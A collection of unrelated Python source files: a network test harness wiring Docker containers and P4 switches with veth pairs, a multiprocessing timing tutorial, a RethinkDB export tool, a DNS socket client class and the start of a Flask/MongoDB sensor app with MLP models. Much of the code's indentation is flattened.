ipam_config = docker.types.IPAMConfig(pool_configs=[ipam_pool])
self.mgnt_network = self.client.networks.create(
"mgnt", driver="bridge", ipam=ipam_config
)
except docker.errors.APIError as error:
# Check if error is network overlap
if "overlap" in str(error):
self.mgnt_network = self.client.networks.get("mgnt")
else:
raise error
self.mgnt_network.connect(
self.ptf_tester, ipv4_address=MGNT_NETWORK_SUBNET + ".0.2"
)
for node in self.nodes:
node_config = self.network_config["nodes"][node.name]
ip_addr = f"{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}"
self.mgnt_network.connect(node, ipv4_address=ip_addr)
def connect_nodes_to_switch(self):
"""
        This will create veth pairs for all links defined in the network config.
Each veth will also be moved to the correct network namespace.
"""
client_low = docker.APIClient()
self.start_containers()
ip = IPRoute()
        # Check if the netns folder exists. If not, create one for netns to look into
if not os.path.exists("/var/run/netns"):
os.mkdir("/var/run/netns")
for link in self.network_config["links"]:
device1 = link["device1"]
device2 = link["device2"]
pid_device1 = client_low.inspect_container(device1)["State"]["Pid"]
pid_device2 = client_low.inspect_container(device2)["State"]["Pid"]
            # Interface names. Naming convention differs depending on connection type
iface_device1 = ""
iface_device2 = ""
            # If connecting to a switch, make sure it is set up
if link["type"] == "Node_to_Switch":
switch_is_setup = os.path.exists(f"/proc/{pid_device2}/ns/net")
# Wait until switch is setup
max_wait_seconds = 10
seconds_waited = 0
while not switch_is_setup and seconds_waited <= max_wait_seconds:
switch_is_setup = os.path.exists(f"/proc/{pid_device2}/ns/net")
time.sleep(1)
seconds_waited += 1
                # Check if namespaces are added. If not, add a symlink to the namespace
if not os.path.islink(f"/var/run/netns/{device1}"):
os.symlink(
f"/proc/{pid_device1}/ns/net",
f"/var/run/netns/{device1}",
)
if not os.path.islink(f"/var/run/netns/{device2}"):
if not os.path.exists(f"/var/run/netns/{device2}"):
os.symlink(
f"/proc/{pid_device2}/ns/net",
f"/var/run/netns/{device2}",
)
iface_device1 = f"{link['device1']}_{link['device1_port']}"
iface_device2 = f"{link['device2']}_{link['device2_port']}"
# Create Veth pair and put them in the right namespace
ip.link("add", ifname=iface_device1, peer=iface_device2, kind="veth")
id_node = ip.link_lookup(ifname=iface_device1)[0]
ip.link("set", index=id_node, state="up")
ip.link("set", index=id_node, net_ns_fd=link["device1"])
id_switch = ip.link_lookup(ifname=iface_device2)[0]
ip.link("set", index=id_switch, state="up")
ip.link("set", index=id_switch, net_ns_fd=link["device2"])
# Start all veth port in Nodes
ns = NetNS(device1)
ns.link("set", index=id_node, state="up")
if "ipv4_addr" in self.network_config["nodes"][device1]:
ns.addr(
"add",
index=id_node,
address=self.network_config["nodes"][device1]["ipv4_addr"],
prefixlen=24,
)
if "ipv6_addr" in link:
continue
if link["type"] == "Switch_to_Switch":
switch_is_setup1 = os.path.exists(f"/proc/{pid_device1}/ns/net")
switch_is_setup2 = os.path.exists(f"/proc/{pid_device2}/ns/net")
max_wait_seconds = 10
seconds_waited = 0
                while (
                    not (switch_is_setup1 and switch_is_setup2)
                    and seconds_waited <= max_wait_seconds
                ):
switch_is_setup1 = os.path.exists(f"/proc/{pid_device1}/ns/net")
switch_is_setup2 = os.path.exists(f"/proc/{pid_device2}/ns/net")
time.sleep(1)
seconds_waited += 1
                # Check if namespaces are added. If not, add a symlink to the namespace
if not os.path.islink(f"/var/run/netns/{device1}"):
os.symlink(
f"/proc/{pid_device1}/ns/net",
f"/var/run/netns/{device1}",
)
if not os.path.islink(f"/var/run/netns/{device2}"):
if not os.path.exists(f"/var/run/netns/{device2}"):
os.symlink(
f"/proc/{pid_device2}/ns/net",
f"/var/run/netns/{device2}",
)
iface_switch1 = f"{link['device1']}_{link['device1_port']}"
iface_switch2 = f"{link['device2']}_{link['device2_port']}"
# Create Veth pair and put them in the right namespace
ip.link("add", ifname=iface_switch1, peer=iface_switch2, kind="veth")
id_switch1 = ip.link_lookup(ifname=iface_switch1)[0]
ip.link("set", index=id_switch1, state="up")
ip.link("set", index=id_switch1, net_ns_fd=link["device1"])
id_switch2 = ip.link_lookup(ifname=iface_switch2)[0]
ip.link("set", index=id_switch2, state="up")
ip.link("set", index=id_switch2, net_ns_fd=link["device2"])
# Start all veth in all the switches
for switch in self.switches:
ns = NetNS(switch.name)
net_interfaces = ns.get_links()
for interface in net_interfaces[2:]:
iface_name = interface["attrs"][0][1]
id_switch = ns.link_lookup(ifname=iface_name)[0]
ns.link("set", index=id_switch, state="up")
def read_tests(self):
"""
Read the test from the ptf container
"""
# Make sure it's started. This is a blocking call
self.ptf_tester.start()
_, test_info = self.ptf_tester.exec_run("ptf --test-dir /app --list")
test_info = test_info.decode()
test_dict = self.extract_info_from_test_info(test_info)
return test_dict
def extract_info_from_test_info(self, test_info):
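        """
        Parse the output of `ptf --list` into a dict that maps each test module
        name to a list of its test names.
        """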
test_info = test_info.split("Test List:")[1]
test_modules = test_info.split("Module ")
nr_of_modules = len(test_modules) - 1
test_modules[len(test_modules) - 1] = test_modules[len(test_modules) - 1].split(
f"\n{nr_of_modules}"
)[0]
test_dict = {}
for i in range(nr_of_modules):
test = test_modules[i + 1].split("\n")
module_name = test.pop(0).split(":")[0]
test_names = []
for test_string in test:
if not str.isspace(test_string) and test_string:
test_names.append(test_string.split(":")[0].strip())
test_dict[module_name] = test_names
return test_dict
def get_system_info(self):
return systeminfo.SystemInfo()
def read_folder_paths(self, benchmark):
switch_folder = ""
ptf_folder = ""
network_config = ""
option_index = 0
while option_index < len(benchmark.options):
if "switch" in benchmark.options[option_index].lower():
switch_folder = benchmark.options[option_index + 1]
elif "ptf" in benchmark.options[option_index].lower():
ptf_folder = benchmark.options[option_index + 1]
elif "network_config" in benchmark.options[option_index].lower():
network_config = benchmark.options[option_index + 1]
option_index += 2
if "~" in switch_folder:
switch_folder = self.extract_path(switch_folder)
if "~" in ptf_folder:
ptf_folder = self.extract_path(ptf_folder)
if "~" in network_config:
network_config = self.extract_path(network_config)
return switch_folder, ptf_folder, network_config
def extract_path(self, path):
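        """
        Expand a leading "~" in `path` to the current user's home directory,
        derived from the first two components of the current working directory.
        """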
import subprocess
split = subprocess.run(["pwd"], capture_output=True).stdout.decode().split("/")
home_dir = f"/{split[1]}/{split[2]}"
new_path = path.replace("~", home_dir)
return new_path
def stop(self):
"""
        Needed for automatic cleanup by benchexec.
"""
self.close()
def close(self):
"""
        Cleans up all running containers and clears all created namespaces.
        Should be called when the test is done.
"""
logging.info("Closing containers and cleaning up namespace")
container_threads = []
for container in self.nodes:
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(container,)
)
)
if os.path.islink(f"/var/run/netns/{container.name}"):
os.remove(f"/var/run/netns/{container.name}")
for container in self.switches:
if os.path.isdir(f"{self.switch_source_path}/{container.name}"):
rmtree(f"{self.switch_source_path}/{container.name}")
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(container,)
)
)
if os.path.islink(f"/var/run/netns/{container.name}"):
os.remove(f"/var/run/netns/{container.name}")
if self.ptf_tester:
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(self.ptf_tester,)
)
)
[x.start() for x in container_threads]
[x.join() for x in container_threads]
# Remove when all containers are closed
if self.mgnt_network:
self.mgnt_network.remove()
def thread_remove_container(self, container):
container.remove(force=True)
def start_containers(self):
"""
        Start all containers. This is done with threads. This function does not
        guarantee that the containers are started.
"""
containers_to_start = self.nodes + self.switches
containers_to_start.append(self.ptf_tester)
container_threads = []
for container in containers_to_start:
container_threads.append(
threading.Thread(target=lambda x: x.start(), args=(container,))
)
# Start and wait for all to finish
[x.start() for x in container_threads]
[x.join() for x in container_threads]
def thread_container_start(self, container):
container.start()
def start_container_listening(self):
"""
        This will set all the nodes and switches up for testing. This means all nodes run
        the ptf agent script and all switches run the switch startup command. All the ports
        and their configuration are set automatically.
"""
container_threads = []
for node_container in self.nodes:
# Read node info
node_config = self.network_config["nodes"][node_container.name]
node_command = (
f"python3 /usr/local/src/ptf/ptf_nn/ptf_nn_agent.py --device-socket "
f"{node_config['id']}@tcp://{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}:10001"
)
used_ports = self.network_config["nodes"][node_container.name]["used_ports"]
for port_nr in used_ports:
node_command += " -i {0}-{1}@{2}_{1}".format(
node_config["id"], port_nr, node_container.name
)
container_threads.append(
threading.Thread(
target=self.thread_setup_node, args=(node_container, node_command)
)
)
for switch in self.switches:
switch_config = self.network_config["switches"][switch.name]
switch_command = "simple_switch --log-file /app/log/switch_log --log-flush"
used_ports = self.network_config["switches"][switch.name]["used_ports"]
for port in used_ports:
switch_command += f" -i {port}@{switch.name}_{port}"
switch_command += f" /app/P4/{switch_config['p4_file_name']}"
container_threads.append(
threading.Thread(
target=self.thread_setup_switch, args=(switch, switch_command)
)
)
        # Wait for all to set up before leaving the method
[x.start() for x in container_threads]
[x.join() for x in container_threads]
def set_link_state(self, ns, state, iface_ids):
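        """
        Set the given interfaces to "UP" or "DOWN" inside the namespace handle `ns`.
        """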
available_states = ["UP", "DOWN"]
if state in available_states:
for iface_id in iface_ids:
ns.link("set", index=iface_id, state=state)
def thread_setup_switch(self, switch_container, switch_command):
"""
        Sets up a switch. Meant to be run in a thread.
"""
ns = NetNS(switch_container.name)
# Check if some interface failed to start
while len(ns.link_lookup(IFLA_OPERSTATE="DOWN")) != 0:
self.set_link_state(ns, "UP", ns.link_lookup(IFLA_OPERSTATE="DOWN"))
time.sleep(1)
switch_container.exec_run(switch_command, detach=True)
switch_is_setup = False
switch_log_file_path = (
f"{self.switch_source_path}/{switch_container.name}/log/switch_log.txt"
)
# This loop will wait until server is started up
while not switch_is_setup:
with open(switch_log_file_path, "r") as f:
info_string = f.read()
switch_is_setup = "Thrift server was started" in info_string
time.sleep(1)
# Load tables
if "table_entries" in self.network_config["switches"][switch_container.name]:
for table_name in self.network_config["switches"][switch_container.name][
"table_entries"
]:
table_file_path = f"{self.switch_source_path}/{switch_container.name}/tables/{table_name}"
if os.path.exists(table_file_path):
switch_container.exec_run(
f"python3 /app/table_handler.py "
f"{self.switch_target_path}/tables/{table_name}",
detach=True,
)
else:
logging.info("Could not find table: \n %s", table_file_path)
self.nr_of_active_containers.increment()
def thread_setup_node(self, node_container, node_command):
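        """
        Start the ptf agent inside the node container and mark the container
        as active. Meant to be run in a thread.
        """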
node_container.exec_run(node_command, detach=True)
self.nr_of_active_containers.increment()
def create_switch_mount_copy(self, switch_name):
switch_path = f"{self.switch_source_path}/{switch_name}"
os.mkdir(switch_path)
# Copy relevant folders
os.mkdir(switch_path + "/log")
os.mkdir(switch_path + "/P4")
os.mkdir(switch_path + "/tables")
# Create log file for switch to use
        open(switch_path + "/log/switch_log.txt", "x").close()
copy_tree(self.switch_source_path + "/P4", switch_path + "/P4")
copy_tree(self.switch_source_path + "/tables", switch_path + "/tables")
copyfile(
self.switch_source_path + "/table_handler.py",
switch_path + "/table_handler.py",
)
return switch_path
def move_file_to_zip(self, file_path, output_handler, benchmark):
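        """
        Move `file_path` into the result zip of `output_handler`, stored relative
        to the benchmark log folder, and delete the original file.
        """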
log_file_path = os.path.relpath(
file_path, os.path.join(benchmark.log_folder, os.pardir)
)
output_handler.log_zip.write(file_path, log_file_path)
os.remove(file_path)
def network_file_isValid(self):
"""
        Simple check through the network file.
"""
if not self.network_config:
logging.debug("No network file is defined for validation")
return False
else:
# Check nodes
if "nodes" not in self.network_config:
logging.debug("No nodes defined in network config")
return False
elif len(self.network_config["nodes"]) == 0:
logging.debug("No nodes defined in network config")
return False
# Check for duplicate node names TODO Check duplicate ids
node_names = list(self.network_config["nodes"].keys())
for node_name in node_names:
if node_names.count(node_name) > 1:
logging.debug("Duplicate node name detected")
return False
# Check switches
if "switches" not in self.network_config:
logging.debug("No switches defined")
return False
elif len(self.network_config["switches"]) == 0:
logging.debug("No nodes defined in network config")
return False
switch_names = list(self.network_config["switches"].keys())
for switch_name in switch_names:
if switch_names.count(switch_name) > 1:
logging.debug("Duplicate switch name detected")
return False
# Check links
if "links" in self.network_config:
all_devices = switch_names + node_names
for link in self.network_config["links"]:
if (
not link["device1"] in all_devices
or not link["device2"] in all_devices
):
logging.debug("Link between none defined devices detected")
return False
                    if (
                        type(link["device1_port"]) is not int
                        or type(link["device2_port"]) is not int
                    ):
return False
return True
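# Illustrative sketch (not part of the original module): a minimal network_config
# using only the keys referenced above. Names, ids, and ports are placeholders.
#
# EXAMPLE_NETWORK_CONFIG = {
#     "nodes": {
#         "node1": {"id": 0, "used_ports": [1], "ipv4_addr": "10.0.0.1"},
#     },
#     "switches": {
#         "switch1": {"used_ports": [1], "p4_file_name": "basic.json"},
#     },
#     "links": [
#         {
#             "type": "Node_to_Switch",
#             "device1": "node1",
#             "device1_port": 1,
#             "device2": "switch1",
#             "device2_port": 1,
#         },
#     ],
# }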
|
multiprocessing4_efficiency_comparison.py
|
# View more 3_python 1_tensorflow_new tutorial on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import multiprocessing as mp
import threading as td
import time
def job(q):
res = 0
for i in range(1000000):
res += i+i**2+i**3
q.put(res) # queue
def multicore():
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print('multicore:' , res1+res2)
def normal():
res = 0
for _ in range(2):
for i in range(1000000):
res += i+i**2+i**3
print('normal:', res)
def multithread():
q = mp.Queue()
t1 = td.Thread(target=job, args=(q,))
t2 = td.Thread(target=job, args=(q,))
t1.start()
t2.start()
t1.join()
t2.join()
res1 = q.get()
res2 = q.get()
print('multithread:', res1+res2)
if __name__ == '__main__':
st = time.time()
normal()
st1= time.time()
print('normal time:', st1 - st)
multithread()
st2 = time.time()
print('multithread time:', st2 - st1)
multicore()
print('multicore time:', time.time()-st2)
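    # Note (added): for this CPU-bound job, CPython's GIL prevents the two threads
    # from running in parallel, so the multithread version is expected to take about
    # as long as 'normal' (or longer), while multicore can use separate cores and
    # usually finishes faster.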
|
_export.py
|
#!/usr/bin/env python
from __future__ import print_function
import collections, csv, ctypes, datetime, json, math, multiprocessing, numbers
import optparse, os, platform, tempfile, re, signal, sys, time, traceback
from . import errors, net, query, utils_common
try:
unicode
except NameError:
unicode = str
try:
from Queue import Empty, Full
except ImportError:
from queue import Empty, Full
try:
from multiprocessing import Queue, SimpleQueue
except ImportError:
from multiprocessing.queues import Queue, SimpleQueue
usage = """rethinkdb export [-c HOST:PORT] [-p] [--password-file FILENAME] [--tls-cert filename] [-d DIR] [-e (DB | DB.TABLE)]...
[--format (csv | json | ndjson)] [--fields FIELD,FIELD...] [--delimiter CHARACTER]
[--clients NUM]"""
help_description = '`rethinkdb export` exports data from a RethinkDB cluster into a directory'
help_epilog = '''
EXAMPLES:
rethinkdb export -c mnemosyne:39500
Export all data from a cluster running on host 'mnemosyne' with a client port at 39500.
rethinkdb export -e test -d rdb_export
Export only the 'test' database on a local cluster into a named directory.
rethinkdb export -c hades -e test.subscribers -p
Export a specific table from a cluster running on host 'hades' which requires a password.
rethinkdb export --format csv -e test.history --fields time,message --delimiter ';'
Export a specific table from a local cluster in CSV format with the fields 'time' and 'message',
using a semicolon as field delimiter (rather than a comma).
rethinkdb export --fields id,value -e test.data
Export a specific table from a local cluster in JSON format with only the fields 'id' and 'value'.
'''
def parse_options(argv, prog=None):
if platform.system() == "Windows" or platform.system().lower().startswith('cygwin'):
defaultDir = "rethinkdb_export_%s" % datetime.datetime.today().strftime("%Y-%m-%dT%H-%M-%S") # no colons in name
else:
defaultDir = "rethinkdb_export_%s" % datetime.datetime.today().strftime("%Y-%m-%dT%H:%M:%S") # "
parser = utils_common.CommonOptionsParser(usage=usage, description=help_description, epilog=help_epilog, prog=prog)
parser.add_option("-d", "--directory", dest="directory", metavar="DIRECTORY", default=defaultDir, help='directory to output to (default: rethinkdb_export_DATE_TIME)', type="new_file")
parser.add_option("-e", "--export", dest="db_tables", metavar="DB|DB.TABLE", default=[], help='limit dump to the given database or table (may be specified multiple times)', action="append", type="db_table")
parser.add_option("--fields", dest="fields", metavar="<FIELD>,...", default=None, help='export only specified fields (required for CSV format)')
parser.add_option("--format", dest="format", metavar="json|csv|ndjson", default="json", help='format to write (defaults to json. ndjson is newline delimited json.)', type="choice", choices=['json', 'csv', 'ndjson'])
parser.add_option("--clients", dest="clients", metavar="NUM", default=3, help='number of tables to export simultaneously (default: 3)', type="pos_int")
parser.add_option("--read-outdated", dest="outdated", default=False, help='use outdated read mode', action="store_true")
csvGroup = optparse.OptionGroup(parser, 'CSV options')
csvGroup.add_option("--delimiter", dest="delimiter", metavar="CHARACTER", default=None, help="character to be used as field delimiter, or '\\t' for tab (default: ',')")
parser.add_option_group(csvGroup)
options, args = parser.parse_args(argv)
# -- Check validity of arguments
if len(args) != 0:
parser.error("No positional arguments supported. Unrecognized option(s): %s" % args)
if options.fields:
if len(options.db_tables) != 1 or options.db_tables[0].table is None:
parser.error("The --fields option can only be used when exporting a single table")
options.fields = options.fields.split(",")
# - format specific validation
if options.format == "csv":
if options.fields is None:
parser.error("CSV files require the '--fields' option to be specified.")
if options.delimiter is None:
options.delimiter = ","
elif options.delimiter == "\\t":
options.delimiter = "\t"
elif len(options.delimiter) != 1:
parser.error("Specify exactly one character for the --delimiter option: %s" % options.delimiter)
else:
if options.delimiter:
parser.error("--delimiter option is only valid for CSV file formats")
# -
return options
def json_writer(filename, fields, task_queue, error_queue, format):
try:
with open(filename, "w") as out:
first = True
if format != "ndjson":
out.write("[")
item = task_queue.get()
while not isinstance(item, StopIteration):
row = item[0]
if fields is not None:
for item in list(row.keys()):
if item not in fields:
del row[item]
if first:
if format == "ndjson":
out.write(json.dumps(row))
else:
out.write("\n" + json.dumps(row))
first = False
elif format == "ndjson":
out.write("\n" + json.dumps(row))
else:
out.write(",\n" + json.dumps(row))
item = task_queue.get()
if format != "ndjson":
out.write("\n]\n")
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit task so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
def csv_writer(filename, fields, delimiter, task_queue, error_queue):
try:
with open(filename, "w") as out:
out_writer = csv.writer(out, delimiter=delimiter)
out_writer.writerow(fields)
item = task_queue.get()
while not isinstance(item, StopIteration):
row = item[0]
info = []
# If the data is a simple type, just write it directly, otherwise, write it as json
for field in fields:
if field not in row:
info.append(None)
elif isinstance(row[field], numbers.Number):
info.append(str(row[field]))
elif isinstance(row[field], str):
info.append(row[field])
elif isinstance(row[field], unicode):
info.append(row[field].encode('utf-8'))
else:
if str == unicode:
info.append(json.dumps(row[field]))
else:
info.append(json.dumps(row[field]).encode('utf-8'))
out_writer.writerow(info)
item = task_queue.get()
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit task so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
def export_table(db, table, directory, options, error_queue, progress_info, sindex_counter, hook_counter, exit_event):
signal.signal(signal.SIGINT, signal.SIG_DFL) # prevent signal handlers from being set in child processes
writer = None
try:
# -- get table info
table_info = options.retryQuery('table info: %s.%s' % (db, table), query.db(db).table(table).info())
# Rather than just the index names, store all index information
table_info['indexes'] = options.retryQuery(
'table index data %s.%s' % (db, table),
query.db(db).table(table).index_status(),
runOptions={'binary_format':'raw'}
)
table_info['write_hook'] = options.retryQuery(
'table write hook data %s.%s' % (db, table),
query.db(db).table(table).get_write_hook(),
runOptions={'binary_format':'raw'})
        if table_info['write_hook'] is not None:
hook_counter.value += 1
with open(os.path.join(directory, db, table + '.info'), 'w') as info_file:
info_file.write(json.dumps(table_info) + "\n")
with sindex_counter.get_lock():
sindex_counter.value += len(table_info["indexes"])
# -- start the writer
task_queue = SimpleQueue()
writer = None
if options.format == "json":
filename = directory + "/%s/%s.json" % (db, table)
writer = multiprocessing.Process(target=json_writer, args=(filename, options.fields, task_queue, error_queue, options.format))
elif options.format == "csv":
filename = directory + "/%s/%s.csv" % (db, table)
writer = multiprocessing.Process(target=csv_writer, args=(filename, options.fields, options.delimiter, task_queue, error_queue))
elif options.format == "ndjson":
filename = directory + "/%s/%s.ndjson" % (db, table)
writer = multiprocessing.Process(target=json_writer, args=(filename, options.fields, task_queue, error_queue, options.format))
else:
raise RuntimeError("unknown format type: %s" % options.format)
writer.start()
# -- read in the data source
# -
lastPrimaryKey = None
read_rows = 0
runOptions = {
"time_format":"raw",
"binary_format":"raw"
}
if options.outdated:
runOptions["read_mode"] = "outdated"
cursor = options.retryQuery(
            'initial cursor for %s.%s' % (db, table),
query.db(db).table(table).order_by(index=table_info["primary_key"]),
runOptions=runOptions
)
while not exit_event.is_set():
try:
for row in cursor:
# bail on exit
if exit_event.is_set():
break
# add to the output queue
task_queue.put([row])
lastPrimaryKey = row[table_info["primary_key"]]
read_rows += 1
# Update the progress every 20 rows
if read_rows % 20 == 0:
progress_info[0].value = read_rows
else:
# Export is done - since we used estimates earlier, update the actual table size
progress_info[0].value = read_rows
progress_info[1].value = read_rows
break
except (errors.ReqlTimeoutError, errors.ReqlDriverError) as e:
# connection problem, re-setup the cursor
try:
cursor.close()
except Exception: pass
cursor = options.retryQuery(
'backup cursor for %s.%s' % (db, table),
query.db(db).table(table).between(lastPrimaryKey, None, left_bound="open").order_by(index=table_info["primary_key"]),
runOptions=runOptions
)
except (errors.ReqlError, errors.ReqlDriverError) as ex:
error_queue.put((RuntimeError, RuntimeError(ex.message), traceback.extract_tb(sys.exc_info()[2])))
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
finally:
if writer and writer.is_alive():
task_queue.put(StopIteration())
writer.join()
def abort_export(signum, frame, exit_event, interrupt_event):
interrupt_event.set()
exit_event.set()
# We sum up the row count from all tables for total percentage completion
# This is because table exports can be staggered when there are not enough clients
# to export all of them at once. As a result, the progress bar will not necessarily
# move at the same rate for different tables.
def update_progress(progress_info, options):
rows_done = 0
total_rows = 1
for current, max_count in progress_info:
curr_val = current.value
max_val = max_count.value
if curr_val < 0:
# There is a table that hasn't finished counting yet, we can't report progress
rows_done = 0
break
else:
rows_done += curr_val
total_rows += max_val
if not options.quiet:
utils_common.print_progress(float(rows_done) / total_rows, indent=4)
def run_clients(options, workingDir, db_table_set):
# Spawn one client for each db.table, up to options.clients at a time
exit_event = multiprocessing.Event()
processes = []
error_queue = SimpleQueue()
interrupt_event = multiprocessing.Event()
sindex_counter = multiprocessing.Value(ctypes.c_longlong, 0)
hook_counter = multiprocessing.Value(ctypes.c_longlong, 0)
signal.signal(signal.SIGINT, lambda a, b: abort_export(a, b, exit_event, interrupt_event))
errors = []
try:
progress_info = []
arg_lists = []
for db, table in db_table_set:
tableSize = int(options.retryQuery("count", query.db(db).table(table).info()['doc_count_estimates'].sum()))
progress_info.append((multiprocessing.Value(ctypes.c_longlong, 0),
multiprocessing.Value(ctypes.c_longlong, tableSize)))
arg_lists.append((db, table,
workingDir,
options,
error_queue,
progress_info[-1],
sindex_counter,
hook_counter,
exit_event,
))
# Wait for all tables to finish
while processes or arg_lists:
time.sleep(0.1)
while not error_queue.empty():
exit_event.set() # Stop immediately if an error occurs
errors.append(error_queue.get())
processes = [process for process in processes if process.is_alive()]
if len(processes) < options.clients and len(arg_lists) > 0:
newProcess = multiprocessing.Process(target=export_table, args=arg_lists.pop(0))
newProcess.start()
processes.append(newProcess)
update_progress(progress_info, options)
# If we were successful, make sure 100% progress is reported
# (rows could have been deleted which would result in being done at less than 100%)
if len(errors) == 0 and not interrupt_event.is_set() and not options.quiet:
utils_common.print_progress(1.0, indent=4)
# Continue past the progress output line and print total rows processed
def plural(num, text, plural_text):
return "%d %s" % (num, text if num == 1 else plural_text)
if not options.quiet:
print("\n %s exported from %s, with %s, and %s" %
(plural(sum([max(0, info[0].value) for info in progress_info]), "row", "rows"),
plural(len(db_table_set), "table", "tables"),
plural(sindex_counter.value, "secondary index", "secondary indexes"),
plural(hook_counter.value, "hook function", "hook functions")
))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
if interrupt_event.is_set():
raise RuntimeError("Interrupted")
if len(errors) != 0:
# multiprocessing queues don't handle tracebacks, so they've already been stringified in the queue
for error in errors:
print("%s" % error[1], file=sys.stderr)
if options.debug:
print("%s traceback: %s" % (error[0].__name__, error[2]), file=sys.stderr)
raise RuntimeError("Errors occurred during export")
def run(options):
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
utils_common.check_minimum_version(options, '1.6')
# get the complete list of tables
db_table_set = set()
allTables = [utils_common.DbTable(x['db'], x['name']) for x in options.retryQuery('list tables', query.db('rethinkdb').table('table_config').pluck(['db', 'name']))]
if not options.db_tables:
db_table_set = allTables # default to all tables
else:
allDatabases = options.retryQuery('list dbs', query.db_list().filter(query.row.ne('rethinkdb')))
for db_table in options.db_tables:
db, table = db_table
assert db != 'rethinkdb', "Error: Cannot export tables from the system database: 'rethinkdb'" # should not be possible
if db not in allDatabases:
raise RuntimeError("Error: Database '%s' not found" % db)
if table is None: # This is just a db name, implicitly selecting all tables in that db
db_table_set.update(set([x for x in allTables if x.db == db]))
else:
if utils_common.DbTable(db, table) not in allTables:
raise RuntimeError("Error: Table not found: '%s.%s'" % (db, table))
db_table_set.add(db_table)
# Determine the actual number of client processes we'll have
options.clients = min(options.clients, len(db_table_set))
# create the working directory and its structure
parentDir = os.path.dirname(options.directory)
if not os.path.exists(parentDir):
if os.path.isdir(parentDir):
raise RuntimeError("Output parent directory is not a directory: %s" % (opt, value))
try:
os.makedirs(parentDir)
except OSError as e:
            raise optparse.OptionValueError("Unable to create parent directory %s: %s" % (parentDir, e.strerror))
workingDir = tempfile.mkdtemp(prefix=os.path.basename(options.directory) + '_partial_', dir=os.path.dirname(options.directory))
try:
for db in set([db for db, table in db_table_set]):
os.makedirs(os.path.join(workingDir, str(db)))
except OSError as e:
raise RuntimeError("Failed to create temporary directory (%s): %s" % (e.filename, ex.strerror))
# Run the export
run_clients(options, workingDir, db_table_set)
# Move the temporary directory structure over to the original output directory
try:
if os.path.isdir(options.directory):
os.rmdir(options.directory) # an empty directory is created here when using _dump
elif os.path.exists(options.directory):
raise Exception('There was a file at the output location: %s' % options.directory)
os.rename(workingDir, options.directory)
except OSError as e:
raise RuntimeError("Failed to move temporary directory to output directory (%s): %s" % (options.directory, e.strerror))
def main(argv=None, prog=None):
options = parse_options(argv or sys.argv[1:], prog=prog)
start_time = time.time()
try:
run(options)
except Exception as ex:
if options.debug:
traceback.print_exc()
print(ex, file=sys.stderr)
return 1
if not options.quiet:
print(" Done (%.2f seconds)" % (time.time() - start_time))
return 0
if __name__ == "__main__":
sys.exit(main())
|
dns_server_client.py
|
import threading
from time import sleep
class DNSServerClient:
CLIENT_POLL_INTERVAL = 0.1
RECEIVE_SIZE = 1024
MESSAGE_END = '<END>'
def __init__(self, client_connection, address=None):
print('Created user from {}'.format(address))
self.client_connection = client_connection
self.address = address
self.done_handshake = False
self.poll_thread = None
# Variable to stop the poll threads
self.alive = True
self.inbox = []
self.start_polling()
def get_handshake_done(self):
return self.done_handshake
def handshake_done(self):
self.done_handshake = True
def is_alive(self):
return self.alive
def kill(self):
self.alive = False
def set_address(self, address):
self.address = address
def get_address(self):
return self.address
def get_next_message(self):
if self.inbox:
return self.inbox.pop(0)
else:
return None
def start_polling(self):
self.poll_thread = threading.Thread(target=self._client_poll)
self.poll_thread.start()
def _client_poll(self):
message = ''
while self.alive:
sleep(self.CLIENT_POLL_INTERVAL)
try:
data = self.client_connection.recv(self.RECEIVE_SIZE)
message += data.decode()
# Detect closed socket
if not data:
self.alive = False
print(message)
                # For messages larger than the buffer, keep receiving until the message end marker arrives.
if self.MESSAGE_END not in message:
continue
print('Received {} from {}'.format(message, self.address))
self.inbox.append(message)
except Exception as e:
print('Failed receiving, did the connection close? {}'.format(e))
self.alive = False
# Reset message for next message
message = ''
def send(self, message):
"""
Send a message to this client
:param message: The message to send
:return: None
"""
print('Sending: {}'.format(message))
try:
self.client_connection.sendall(str.encode(message))
except Exception as e:
            print('Failed sending message: {} to {}: {}'.format(message, self.address, e))
def __str__(self):
return '{} alive: {}'.format(self.address, self.alive)
def __del__(self):
self.alive = False
self.client_connection.close()
|
app.py
|
from flask import Flask, jsonify, request
from pymongo import MongoClient
from datetime import datetime
from pytz import timezone
import threading
import time
import json
import os
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.neural_network import MLPRegressor
app = Flask(__name__)
DB_URL = os.environ.get("DB_URL")
client = MongoClient(DB_URL)
db = client.db3
nodes = db.nodes
data = []
qtd_data = 0
TIME_TRAINING = 3600
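# Interval, in seconds, between incremental training passes in the training() thread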
# Record the current time as a formatted string (timestamp of the last data read)
datetime_format = "%d/%m/%Y %H:%M"
date_read = datetime.now()
date_time_last = str(date_read.strftime(datetime_format))
model_1 = MLPRegressor()
model_2 = MLPRegressor()
predictions_1 = []
predictions_2 = []
X_train_1 = None
X_test_1 = None
y_train_1 = None
y_test_1 = None
X_train_2 = None
X_test_2 = None
y_train_2 = None
y_test_2 = None
@app.route('/', methods=['GET'])
def index():
global data
return jsonify(data)
@app.route('/data', methods=['POST'])
def add_data():
id_node = request.json['id_node']
sensors = request.json['sensors']
tz = timezone('America/Sao_Paulo')
now = datetime.now()
datetimenow = now.astimezone(tz)
dt = datetimenow.strftime('%d/%m/%Y %H:%M')
_id = nodes.insert(
{'id_node': id_node, 'datetime': dt, 'sensors': sensors})
